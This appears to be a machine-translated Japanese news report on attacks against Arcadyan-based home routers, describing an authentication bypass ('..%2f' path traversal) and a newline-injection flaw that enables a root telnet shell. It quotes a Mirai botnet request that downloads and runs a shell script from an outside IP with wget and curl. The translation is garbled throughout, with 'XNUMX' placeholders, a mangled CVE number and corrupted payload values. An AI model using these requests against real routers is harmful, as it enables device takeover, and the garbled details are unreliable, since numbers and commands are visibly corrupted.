Arcadyan 社の HTTP サーバー実装をファームウェアに使用しているホーム ルーターに対する大規模な攻撃がネットワーク上で記録されました。 デバイスの制御を取得するには、root 権限による任意のコードのリモート実行を可能にする 2 つの脆弱性の組み合わせが使用されます。 この問題は、Arcadyan、ASUS、Buffalo のかなり広範囲の ADSL ルーターに影響するほか、Beeline ブランド (Smart Box Flash で問題が確認されている)、Deutsche Telekom、Orange、O10、Telus、Verizon、Vodafone などのブランドで提供されるデバイスにも影響します。他の通信事業者。 この問題は Arcadyan ファームウェアに 20 年以上存在しており、この間に 17 の異なるメーカーの少なくとも XNUMX のデバイス モデルへの移行に成功したことが注目されています。
最初の脆弱性 CVE-2021-20090 により、認証なしで任意の Web インターフェイス スクリプトにアクセスできます。 この脆弱性の本質は、Web インターフェイスにおいて、画像、CSS ファイル、JavaScript スクリプトの送信に使用される一部のディレクトリが認証なしでアクセスできることです。 この場合、認証なしでアクセスできるディレクトリは初期マスクでチェックされます。 親ディレクトリに移動するためのパスに「../」文字を指定することはファームウェアによってブロックされますが、「..%2f」の組み合わせの使用はスキップされます。 したがって、「http://192.168.1.1/images/..%2findex.htm」のようなリクエストを送信すると、保護されたページを開くことができます。
2021 番目の脆弱性 CVE-20091-192.168.1.2 では、認証されたユーザーが特別にフォーマットされたパラメータを apply_abstract.cgi スクリプトに送信することで、デバイスのシステム設定を変更できます。このスクリプトはパラメータ内の改行文字の存在をチェックしません。 。 たとえば、攻撃者は、ping 操作を実行する際に、設定ファイル /tmp/etc/config/ を作成するときに、チェック対象の IP アドレスとスクリプトを含むフィールドに値「0%1AARC_SYS_TelnetdEnable=1」を指定する可能性があります。 .glbcfg に「AARC_SYS_TelnetdEnable=2」という行を書き込みます。これにより、telnetd サーバーがアクティブ化され、root 権限による無制限のコマンド シェル アクセスが提供されます。 同様に、AARC_SYS パラメータを設定すると、システム上で任意のコードを実行できます。 XNUMX つ目の脆弱性では、「/images/..%XNUMXfapply_abstract.cgi」としてアクセスすることで、認証なしで問題のあるスクリプトを実行することが可能になります。
脆弱性を悪用するには、攻撃者は Web インターフェイスが実行されているネットワーク ポートにリクエストを送信できる必要があります。 攻撃の広がりのダイナミクスから判断すると、多くのオペレーターは、サポート サービスによる問題の診断を簡素化するために、外部ネットワークからのデバイスへのアクセスを残しておきます。 インターフェイスへのアクセスが内部ネットワークのみに制限されている場合、「DNS リバインド」技術を使用して外部ネットワークから攻撃が実行される可能性があります。 脆弱性は、ルーターを Mirai ボットネットに接続するためにすでに積極的に使用されています: POST /images/..%2fapply_abstract.cgi HTTP/1.1 接続: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7。 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; カール+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
出所: オープンネット.ru